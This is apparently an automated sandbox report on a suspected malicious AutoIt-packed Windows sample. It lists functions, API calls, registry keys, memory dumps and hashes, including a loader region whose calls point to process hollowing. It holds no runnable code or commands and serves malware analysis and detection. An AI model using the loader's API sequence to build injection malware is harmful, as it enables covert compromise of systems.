                                                                            control_flow_graph 1239 32acb3-32ace0 call 326ac0 call 327cf4 call 326986 1246 32ace2-32acf8 call 32e880 1239->1246 1247 32acfd-32ad02 1239->1247 1253 32af52-32af57 call 326b05 1246->1253 1249 32ad08-32ad0f 1247->1249 1251 32ad42-32ad51 GetStartupInfoW 1249->1251 1252 32ad11-32ad40 1249->1252 1254 32ae80-32ae86 1251->1254 1255 32ad57-32ad5c 1251->1255 1252->1249 1256 32af44-32af50 call 32af58 1254->1256 1257 32ae8c-32ae9d 1254->1257 1255->1254 1259 32ad62-32ad79 1255->1259 1256->1253 1260 32aeb2-32aeb8 1257->1260 1261 32ae9f-32aea2 1257->1261 1264 32ad80-32ad83 1259->1264 1265 32ad7b-32ad7d 1259->1265 1268 32aeba-32aebd 1260->1268 1269 32aebf-32aec6 1260->1269 1261->1260 1267 32aea4-32aead 1261->1267 1266 32ad86-32ad8c 1264->1266 1265->1264 1271 32adae-32adb6 1266->1271 1272 32ad8e-32ad9f call 326986 1266->1272 1273 32af3e-32af3f 1267->1273 1274 32aec9-32aed5 GetStdHandle 1268->1274 1269->1274 1276 32adb9-32adbb 1271->1276 1283 32ae33-32ae3a 1272->1283 1284 32ada5-32adab 1272->1284 1273->1254 1277 32aed7-32aed9 1274->1277 1278 32af1c-32af32 1274->1278 1276->1254 1281 32adc1-32adc6 1276->1281 1277->1278 1282 32aedb-32aee4 GetFileType 1277->1282 1278->1273 1280 32af34-32af37 1278->1280 1280->1273 1285 32ae20-32ae31 1281->1285 1286 32adc8-32adcb 1281->1286 1282->1278 1287 32aee6-32aef0 1282->1287 1288 32ae40-32ae4e 1283->1288 1284->1271 1285->1276 1286->1285 1289 32adcd-32add1 1286->1289 1290 32aef2-32aef8 1287->1290 1291 32aefa-32aefd 1287->1291 1295 32ae50-32ae72 1288->1295 1296 32ae74-32ae7b 1288->1296 1289->1285 1297 32add3-32add5 1289->1297 1292 32af05 1290->1292 1293 32af08-32af1a InitializeCriticalSectionAndSpinCount 1291->1293 1294 32aeff-32af03 1291->1294 1292->1293 1293->1273 1294->1292 1295->1288 1296->1266 1298 32add7-32ade3 GetFileType 1297->1298 1299 32ade5-32ae1a InitializeCriticalSectionAndSpinCount 1297->1299 1298->1299 1300 32ae1d 1298->1300 1299->1300 1300->1285
                                                                            APIs
                                                                            • __lock.LIBCMT ref: 0032ACC1
                                                                              • Part of subcall function 00327CF4: __mtinitlocknum.LIBCMT ref: 00327D06
                                                                              • Part of subcall function 00327CF4: EnterCriticalSection.KERNEL32(00000000,?,00327ADD,0000000D), ref: 00327D1F
                                                                            • __calloc_crt.LIBCMT ref: 0032ACD2
                                                                              • Part of subcall function 00326986: __calloc_impl.LIBCMT ref: 00326995
                                                                              • Part of subcall function 00326986: Sleep.KERNEL32(00000000,000003BC,0031F507,?,0000000E), ref: 003269AC
                                                                            • @_EH4_CallFilterFunc@8.LIBCMT ref: 0032ACED
                                                                            • GetStartupInfoW.KERNEL32(?,003B6E28,00000064,00325E91,003B6C70,00000014), ref: 0032AD46
                                                                            • __calloc_crt.LIBCMT ref: 0032AD91
                                                                            • GetFileType.KERNEL32(00000001), ref: 0032ADD8
                                                                            • InitializeCriticalSectionAndSpinCount.KERNEL32(0000000D,00000FA0), ref: 0032AE11
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                                                            • Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
                                                                            Similarity
                                                                            • API ID: CriticalSection__calloc_crt$CallCountEnterFileFilterFunc@8InfoInitializeSleepSpinStartupType__calloc_impl__lock__mtinitlocknum
                                                                            • String ID:
                                                                            • API String ID: 1426640281-0
                                                                            • Opcode ID: 22870c59ab4ae24e8ba6f12bed86930a5b546185daca75d0c852ac34f2455c89
                                                                            • Instruction ID: 60ac058e11c0b767771ae4fd22d5cff4d757f38b36f1f55f2404a11b76b4fe3c
                                                                            • Opcode Fuzzy Hash: 22870c59ab4ae24e8ba6f12bed86930a5b546185daca75d0c852ac34f2455c89
                                                                            • Instruction Fuzzy Hash: EE81E270905B658FDB16CF68E8809ADBBF4AF09324F25425DD4A6EB3E1D7349803CB52
                                                                            Function 00D46E90 Relevance: 10.7, APIs: 7, Instructions: 239fileCOMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 1301 d46e90-d46f3e call d448a0 1304 d46f45-d46f6b call d47da0 CreateFileW 1301->1304 1307 d46f72-d46f82 1304->1307 1308 d46f6d 1304->1308 1316 d46f84 1307->1316 1317 d46f89-d46fa3 VirtualAlloc 1307->1317 1309 d470bd-d470c1 1308->1309 1310 d47103-d47106 1309->1310 1311 d470c3-d470c7 1309->1311 1313 d47109-d47110 1310->1313 1314 d470d3-d470d7 1311->1314 1315 d470c9-d470cc 1311->1315 1320 d47165-d4717a 1313->1320 1321 d47112-d4711d 1313->1321 1322 d470e7-d470eb 1314->1322 1323 d470d9-d470e3 1314->1323 1315->1314 1316->1309 1318 d46fa5 1317->1318 1319 d46faa-d46fc1 ReadFile 1317->1319 1318->1309 1324 d46fc3 1319->1324 1325 d46fc8-d47008 VirtualAlloc 1319->1325 1328 d4717c-d47187 VirtualFree 1320->1328 1329 d4718a-d47192 1320->1329 1326 d47121-d4712d 1321->1326 1327 d4711f 1321->1327 1330 d470ed-d470f7 1322->1330 1331 d470fb 1322->1331 1323->1322 1324->1309 1332 d4700f-d4702a call d47ff0 1325->1332 1333 d4700a 1325->1333 1334 d47141-d4714d 1326->1334 1335 d4712f-d4713f 1326->1335 1327->1320 1328->1329 1330->1331 1331->1310 1341 d47035-d4703f 1332->1341 1333->1309 1338 d4714f-d47158 1334->1338 1339 d4715a-d47160 1334->1339 1337 d47163 1335->1337 1337->1313 1338->1337 1339->1337 1342 d47041-d47070 call d47ff0 1341->1342 1343 d47072-d47086 call d47e00 1341->1343 1342->1341 1348 d47088 1343->1348 1349 d4708a-d4708e 1343->1349 1348->1309 1351 d47090-d47094 CloseHandle 1349->1351 1352 d4709a-d4709e 1349->1352 1351->1352 1353 d470a0-d470ab VirtualFree 1352->1353 1354 d470ae-d470b7 1352->1354 1353->1354 1354->1304 1354->1309
                                                                            APIs
                                                                            • CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000), ref: 00D46F61
                                                                            • VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 00D47187
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2346669744.0000000000D44000.00000040.00000020.00020000.00000000.sdmp, Offset: 00D44000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_d44000_mnXS9meqtB.jbxd
                                                                            Similarity
                                                                            • API ID: CreateFileFreeVirtual
                                                                            • String ID:
                                                                            • API String ID: 204039940-0
                                                                            • Opcode ID: d349c2c11462b54f33c86561be68849ac3e84e681e3d8bb3fdc8e10bc75df865
                                                                            • Instruction ID: 7ee08922c2488560cee28fae28a514b5c55d1840d1b6c26e0e84c5721e808e58
                                                                            • Opcode Fuzzy Hash: d349c2c11462b54f33c86561be68849ac3e84e681e3d8bb3fdc8e10bc75df865
                                                                            • Instruction Fuzzy Hash: EAA11570E05209EBDB14CFA4C894BEEBBB5FF48304F248559E601BB280D7759A85CFA5
                                                                            Function 003049FB Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 73registryCOMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 1410 3049fb-304a25 call 30bcce RegOpenKeyExW 1413 3741cc-3741e3 RegQueryValueExW 1410->1413 1414 304a2b-304a2f 1410->1414 1415 374246-37424f RegCloseKey 1413->1415 1416 3741e5-374222 call 31f4ea call 3047b7 RegQueryValueExW 1413->1416 1421 374224-37423b call 306a63 1416->1421 1422 37423d-374245 call 3047e2 1416->1422 1421->1422 1422->1415
                                                                            APIs
                                                                            • RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?), ref: 00304A1D
                                                                            • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 003741DB
                                                                            • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 0037421A
                                                                            • RegCloseKey.ADVAPI32(?), ref: 00374249
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                                                            • Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
                                                                            Similarity
                                                                            • API ID: QueryValue$CloseOpen
                                                                            • String ID: Include$Software\AutoIt v3\AutoIt
                                                                            • API String ID: 1586453840-614718249
                                                                            • Opcode ID: 568f7000cbce93d8f276dfe69e66cdea964c9906efc6841b3b951c9edc896cdc
                                                                            • Instruction ID: c165115c625cd271999d6c71f9c558e95fc60b1cc0f8f220e8e9e868458373be
                                                                            • Opcode Fuzzy Hash: 568f7000cbce93d8f276dfe69e66cdea964c9906efc6841b3b951c9edc896cdc
                                                                            • Instruction Fuzzy Hash: 40116DB1601209BEEB16ABA4CD96DEF7BACEF04744F004054F506D6191EB70AE01DB50
                                                                            Function 003036B8 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 44COMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 1437 3036b8-303728 CreateWindowExW * 2 ShowWindow * 2
                                                                            APIs
                                                                            • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 003036E6
                                                                            • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00303707
                                                                            • ShowWindow.USER32(00000000,?,?,?,?,00303AA3,?), ref: 0030371B
                                                                            • ShowWindow.USER32(00000000,?,?,?,?,00303AA3,?), ref: 00303724
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                                                            • Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
                                                                            Similarity
                                                                            • API ID: Window$CreateShow
                                                                            • String ID: AutoIt v3$edit
                                                                            • API String ID: 1584632944-3779509399
                                                                            • Opcode ID: bf542ee2798a1e27c7a5636c2276cd04ec5dd8f8a591e7583fe2de98754f1baf
                                                                            • Instruction ID: e0391ebd70726112edfd47b06271b38c572fd0ebf7ad17464fc5df3184a294b0
                                                                            • Opcode Fuzzy Hash: bf542ee2798a1e27c7a5636c2276cd04ec5dd8f8a591e7583fe2de98754f1baf
                                                                            • Instruction Fuzzy Hash: 12F0DA755402E07AEB325B67AC09E672E7DEBC7F24F00001ABA04E21A1C56528A5EBB0
                                                                            Function 00D46C50 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 148fileCOMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 1542 d46c50-d46d8d call d448a0 call d46b40 CreateFileW 1549 d46d94-d46da4 1542->1549 1550 d46d8f 1542->1550 1553 d46da6 1549->1553 1554 d46dab-d46dc5 VirtualAlloc 1549->1554 1551 d46e44-d46e49 1550->1551 1553->1551 1555 d46dc7 1554->1555 1556 d46dc9-d46de0 ReadFile 1554->1556 1555->1551 1557 d46de4-d46e1e call d46b80 call d45b40 1556->1557 1558 d46de2 1556->1558 1563 d46e20-d46e35 call d46bd0 1557->1563 1564 d46e3a-d46e42 ExitProcess 1557->1564 1558->1551 1563->1564 1564->1551
                                                                            APIs
                                                                              • Part of subcall function 00D46B40: Sleep.KERNELBASE(000001F4), ref: 00D46B51
                                                                            • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 00D46D83
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2346669744.0000000000D44000.00000040.00000020.00020000.00000000.sdmp, Offset: 00D44000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_d44000_mnXS9meqtB.jbxd
                                                                            Similarity
                                                                            • API ID: CreateFileSleep
                                                                            • String ID: CJV7Y9174NENJCCC
                                                                            • API String ID: 2694422964-3284114443
                                                                            • Opcode ID: bdd541ccb8cf7903bb101bd7ac80f472d2efdaaa6c201eabf0ee0ab7ff4ff620
                                                                            • Instruction ID: 3b7a74608b36393718a41ebb2335119fff45c869da07ec31f8034f1ee8d1df61
                                                                            • Opcode Fuzzy Hash: bdd541ccb8cf7903bb101bd7ac80f472d2efdaaa6c201eabf0ee0ab7ff4ff620
                                                                            • Instruction Fuzzy Hash: FC516D70E04248EBEB11DBA4C815BEEBB79EF15304F004199E609BB2C1D6B95B45CB76
                                                                            Function 00304A30 Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 138COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 00305374: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,003C1148,?,003061FF,?,00000000,00000001,00000000), ref: 00305392
                                                                              • Part of subcall function 003049FB: RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?), ref: 00304A1D
                                                                            • _wcscat.LIBCMT ref: 00372D80
                                                                            • _wcscat.LIBCMT ref: 00372DB5
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                                                            • Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
                                                                            Similarity
                                                                            • API ID: _wcscat$FileModuleNameOpen
                                                                            • String ID: 8!<$\$\Include\
                                                                            • API String ID: 3592542968-4102530510
                                                                            • Opcode ID: e95229aefca153d371a37ff0103f91ee4050192fe648c54e364a48c1b310d898
                                                                            • Instruction ID: 1fa24ca6bce4175597acc0b0be5f13d2d3b4f54ae7296c5b2f85fb3d93ab96fa
                                                                            • Opcode Fuzzy Hash: e95229aefca153d371a37ff0103f91ee4050192fe648c54e364a48c1b310d898
                                                                            • Instruction Fuzzy Hash: E8515EB54053409FC717EF55E892C9BB3F8BE59300F48452EF649DB2A1EB74AA08CB52
                                                                            Function 003051AF Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 88windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • _memset.LIBCMT ref: 0030522F
                                                                            • _wcscpy.LIBCMT ref: 00305283
                                                                            • Shell_NotifyIconW.SHELL32(00000001,?), ref: 00305293
                                                                            • LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 00373CB0
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                                                            • Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
                                                                            Similarity
                                                                            • API ID: IconLoadNotifyShell_String_memset_wcscpy
                                                                            • String ID: Line:
                                                                            • API String ID: 1053898822-1585850449
                                                                            • Opcode ID: c0d5bd6a709eefff041278250f22fc359e19f6108a5578a35ca80217872f19a9
                                                                            • Instruction ID: 379c4f2886115c8dceb23ceb0c562fd48ce2145475f55bc29c0949c9ff5bc5eb
                                                                            • Opcode Fuzzy Hash: c0d5bd6a709eefff041278250f22fc359e19f6108a5578a35ca80217872f19a9
                                                                            • Instruction Fuzzy Hash: 7031AC7100A750AFD727EB60EC66FEB77DCAF45300F00491AF589960D2EB74A6488B96
                                                                            Function 00304139 Relevance: 7.3, APIs: 2, Strings: 2, Instructions: 258COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 003041A9: LoadLibraryExW.KERNEL32(00000001,00000000,00000002,?,?,?,?,003039FE,?,00000001), ref: 003041DB
                                                                            • _free.LIBCMT ref: 003736B7
                                                                            • _free.LIBCMT ref: 003736FE
                                                                              • Part of subcall function 0030C833: __wsplitpath.LIBCMT ref: 0030C93E
                                                                              • Part of subcall function 0030C833: _wcscpy.LIBCMT ref: 0030C953
                                                                              • Part of subcall function 0030C833: _wcscat.LIBCMT ref: 0030C968
                                                                              • Part of subcall function 0030C833: SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,00000001,?,?,00000000), ref: 0030C978
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                                                            • Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
                                                                            Similarity
                                                                            • API ID: _free$CurrentDirectoryLibraryLoad__wsplitpath_wcscat_wcscpy
                                                                            • String ID: >>>AUTOIT SCRIPT<<<$Bad directive syntax error
                                                                            • API String ID: 805182592-1757145024
                                                                            • Opcode ID: bef2cc0170e19cd9a813c6f238ed8f1b9d327b9a407d191ba8168971d115a1c5
                                                                            • Instruction ID: 1ac1f8e9791d9da07d4ac3f53c13ddd9cbe24a0beaa7dc49f372e722d05ee5b8
                                                                            • Opcode Fuzzy Hash: bef2cc0170e19cd9a813c6f238ed8f1b9d327b9a407d191ba8168971d115a1c5
                                                                            • Instruction Fuzzy Hash: 40917171910219AFCF16EFA4CC919EEB7B4FF19310F10842AF51AAF291DB34AA45DB50
                                                                            Function 003040E5 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 64COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • _memset.LIBCMT ref: 00373725
                                                                            • GetOpenFileNameW.COMDLG32 ref: 0037376F
                                                                              • Part of subcall function 0030660F: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,003053B1,?,?,003061FF,?,00000000,00000001,00000000), ref: 0030662F
                                                                              • Part of subcall function 003040A7: GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 003040C6
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                                                            • Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
                                                                            Similarity
                                                                            • API ID: Name$Path$FileFullLongOpen_memset
                                                                            • String ID: X$t3;
                                                                            • API String ID: 3777226403-4152952806
                                                                            • Opcode ID: 2b4bd5a912cbf9a6e348da62b6e4f103ff9b48880fca8050755ee65935b6ff27
                                                                            • Instruction ID: 8bd08dd5884aa7930faeed177b1dbfa2d2eb12154edcc40beb38591d749a6e12
                                                                            • Opcode Fuzzy Hash: 2b4bd5a912cbf9a6e348da62b6e4f103ff9b48880fca8050755ee65935b6ff27
                                                                            • Instruction Fuzzy Hash: AE21C3B1A002989BCB17DF94D815BDEBBFC9F49304F008059E505AB281DBB49A898F65
                                                                            Function 003234AE Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 61COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • __getstream.LIBCMT ref: 003234FE
                                                                              • Part of subcall function 00327C0E: __getptd_noexit.LIBCMT ref: 00327C0E
                                                                            • @_EH4_CallFilterFunc@8.LIBCMT ref: 00323539
                                                                            • __wopenfile.LIBCMT ref: 00323549
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                                                            • Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
                                                                            Similarity
                                                                            • API ID: CallFilterFunc@8__getptd_noexit__getstream__wopenfile
                                                                            • String ID: <G
                                                                            • API String ID: 1820251861-2138716496
                                                                            • Opcode ID: 416e5bc6d68ee53e9716e2514b0752a14ea6e5676e8e838d3e3c4e103a1ec6d6
                                                                            • Instruction ID: d6fc932922e3032bf68b4c63148709528d45ed1765e470b6afd33dccd6c91359
                                                                            • Opcode Fuzzy Hash: 416e5bc6d68ee53e9716e2514b0752a14ea6e5676e8e838d3e3c4e103a1ec6d6
                                                                            • Instruction Fuzzy Hash: E3112C70A002369FDB13BF75BC4366E36A4AF06750B158965F819DF181EB38CA0197A1
                                                                            Function 0031D298 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 58registryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • RegOpenKeyExW.KERNELBASE(80000001,Control Panel\Mouse,00000000,00000001,00000000,00000003,00000000,80000001,80000001,?,0031D28B,SwapMouseButtons,00000004,?), ref: 0031D2BC
                                                                            • RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,0031D28B,SwapMouseButtons,00000004,?,?,?,?,0031C865), ref: 0031D2DD
                                                                            • RegCloseKey.KERNELBASE(00000000,?,?,0031D28B,SwapMouseButtons,00000004,?,?,?,?,0031C865), ref: 0031D2FF
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                                                            • Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
                                                                            Similarity
                                                                            • API ID: CloseOpenQueryValue
                                                                            • String ID: Control Panel\Mouse
                                                                            • API String ID: 3677997916-824357125
                                                                            • Opcode ID: 469ec508731de507ea897b67fb4c791b8d6158dd2c04baa1b94a6adc2a2cc0e5
                                                                            • Instruction ID: cfadce46eb2beccf98d9baed02db7edfa6d26e7fa1beca732ac869e3a7130604
                                                                            • Opcode Fuzzy Hash: 469ec508731de507ea897b67fb4c791b8d6158dd2c04baa1b94a6adc2a2cc0e5
                                                                            • Instruction Fuzzy Hash: FD1179B9611208BFDB268FA4DC84EEF7BBCEF09740F104869E801D7150E731AE819B60
                                                                            Function 00D45B40 Relevance: 6.7, APIs: 4, Instructions: 720processthreadCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • CreateProcessW.KERNELBASE(?,00000000), ref: 00D4636D
                                                                            • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 00D46391
                                                                            • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 00D463B3
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2346669744.0000000000D44000.00000040.00000020.00020000.00000000.sdmp, Offset: 00D44000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_d44000_mnXS9meqtB.jbxd
                                                                            Similarity
                                                                            • API ID: Process$ContextCreateMemoryReadThreadWow64
                                                                            • String ID:
                                                                            • API String ID: 2438371351-0
                                                                            • Opcode ID: e3f14b9100784c2d13b4d96e4da997e342e741b63af52aad6d222721779d43e7
                                                                            • Instruction ID: 8ea42f9917415272364c3ab4c66e22f939ae325091bbe03f81f8155e4d155438
                                                                            • Opcode Fuzzy Hash: e3f14b9100784c2d13b4d96e4da997e342e741b63af52aad6d222721779d43e7
                                                                            • Instruction Fuzzy Hash: 44621F70A14658DBEB24CFA4C850BDEB371EF59300F1091A9E10DEB394E7759E81CB6A
                                                                            Function 0032365B Relevance: 6.2, APIs: 4, Instructions: 162COMMONLIBRARYCODE
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                                                            • Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
